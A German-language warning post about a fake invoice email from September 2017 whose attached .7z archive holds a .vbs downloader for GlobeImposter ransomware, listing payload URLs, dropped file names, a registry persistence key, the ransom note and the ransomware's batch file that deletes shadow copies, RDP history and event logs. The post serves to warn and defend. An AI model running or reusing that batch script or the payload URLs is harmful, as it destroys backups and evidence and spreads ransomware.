Ransom.GlobeImposter: Invoice INV-00017 from Property Lagoon Limited for Gleneagles Equestrian Centre von Rachael Epworth ([email protected])

Am Montag, den 04. September 2017 wurde durch unbekannte Dritte die folgende betrügerische E-Mail in englischer Sprache versendet. Öffnen Sie nicht die Anlage! Das .7z-Archiv enthält ein .vbs-Script, welches Ransomware nachlädt. In den meisten Fällen handelt es sich dabei auch um die Ransomware „GlobeImposter“ (Verschlüsselungs- und Epressungstrojaner).

Invoice INV-00017 from Property Lagoon Limited for Gleneagles Equestrian Centre
Rachael Epworth ([email protected])

 

Dear customer,

Here’s invoice INV-00017 for USD 756.64.

The amount outstanding of USD 756.64 is due on 9 Sept 2017.

View your bill online

From your online bill you can print a PDF, export a CSV, or create a free login and view your outstanding bills.

If you have any questions, please let us know.

Thanks,

Rachael Epworth
Property Lagoon Limited

Achtung: Es handelt sich um eine betrügerische E-Mail! Klicken Sie nicht auf den Link und öffnen Sie auch nicht nicht die Anlage! Die E-Mail kommt mit unterschiedlichen Absendernamen.

In der E-Mail sind Links enthalten, die ein .7z – Archiv laden sollen. Klicken Sie nicht auf die Links!

  • allsexfinder.com/INV-00022.7z
  • dev.lowndespartnership.co.uk/INV-00022.7z
  • lp-usti.cz/INV-00022.7z
  • mbcconsult.ro/INV-00022.7z
  • northtyneasc.org/INV-00022.7z
  • yamanashi-jyujin.jp/INV-00022.7z

Neben den Links bringt die E-Mail aber auch schon ein .7z – Archiv mit:

Invoice INV-00007.7z
Invoice INV-00016.7z
Invoice INV-00017.7z
Invoice INV-00056.7z
Invoice INV-00062.7z
Invoice INV-00076.7z
Invoice INV-00082.7z

Im .7z – Archiv ist ein .vbs – Script enthalten:

Invoice INV-00242.vbs
Invoice INV-00481.vbs
Invoice INV-00714.vbs
Invoice INV-00781.vbs

Das JavaScript beginnt in etwa so:

Öffnen Sie nicht das .7z – Archiv und führen Sie das Script nicht aus! Von den Internetadressen

  • autoecoleautonome.com/JIKJHgft?
  • autoecolecarces.com/JIKJHgft?
  • brownpa.net/JIKJHgft?
  • calpadia.co.id/JIKJHgft?
  • cogerea.net/JIKJHgft?
  • dueeffepromotion.com/JIKJHgft?
  • hellonwheelsthemovie.com/JIKJHgft?
  • mariamandrioli.com/JIKJHgft?
  • naturofind.org/p66/JIKJHgft
  • prescottinternet.net/JIKJHgft?
  • uvitacr.com/JIKJHgft?

wird eine ausführbare Datei nachgeladen:

KildBDUe.exe
NxywDAMDRTV.exe
ocpQRNemyh.exe
UmdKKtYJq.exe
xfFvlkhacc.exe
yXKuzSJC.exe

Zumindest bei der .exe – Datei mit dem Pfeil-Logo handelt es sich um den Verschlüsselungs- und Erpressungstrojaner „GlobeImposter“ (Ransomware). Virustotal zeigt eine Erkennungsrate von 21/64.

 

Über die Registry sorgt die Datei dafür, dass Sie nach dem Windows – Neustart wieder gestartet wird:

CertificatesCheck
C:\Users\Public\xfFvlkhacc.exe

 

Die Ransomware beginnt sofort damit, alle wichtigen Dateien in .txt umzubenennen:

Microsoft Access Datenbank (neu).accdb..txt
Microsoft Excel-Arbeitsblatt (neu).xlsx..txt
Microsoft PowerPoint-Präsentation (neu).pptx..txt
Microsoft Publisher-Dokument (neu).pub..txt
Neuer ZIP-komprimierter Ordner.zip..txt
Neuer TAR-komprimierter Ordner.tar..txt

 

Weiterhin legt die Ransomware eine .bat-Datei an:

__t1FCF.tmp.bat
__tB0D7.tmp.bat
__tCA8F.tmp.bat
__tD1A0.tmp.bat
__tDFF2.tmp.bat

Diese Batch-Datei hat folgenden Inhalt:

.bat:
@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete „HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default“ /va /f
reg delete „HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers“ /f
reg add „HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers“
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F „tokens=*“ %1 in (‚wevtutil.exe el‘) DO wevtutil.exe cl „%1“

 

Daneben produziert „GlobeImposer“ eine Datei, die auf die Verschlüsselung hinweist:

Read_ME.html

 

Die „Read_ME.html“ zeigt folgenden Inhalt:

Your files are Encrypted!
For data recovery needs decryptor.

If you want to buy a decryptor, fill this form and click „Buy Decryptor“

e-mail:

you ip:

Buy decryptor

 

If not working, click again.

Free decryption as guarantee.
Before paying you can send us 1 file for free decryption.

And finally, if you can not contact, follow these two steps:
1. Install the TOP Browser from this link: torproject.org
2. Open this link in the TOP browser: http://n224ezvhg4sgyamb.onion/sup.php

Sofern man online ist, wird die eigene IP-Adresse in die Meldung eingeblendet.

Die verlinkte TOR-Seite sieht wie folgt aus und verweist wieder nur auf eine Internet-Seite:

SUPPORT
Free decryption as guarantee.
Before paying you can send us 1 file for free decryption.
To send a message or file use this link.

https://ws10.freshdesk.com/support/tickets/new

 

Die verlinkte Internetseite sieht wie folgt aus und zeigt nur ein Kontaktformular:

Kommentar(e)

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert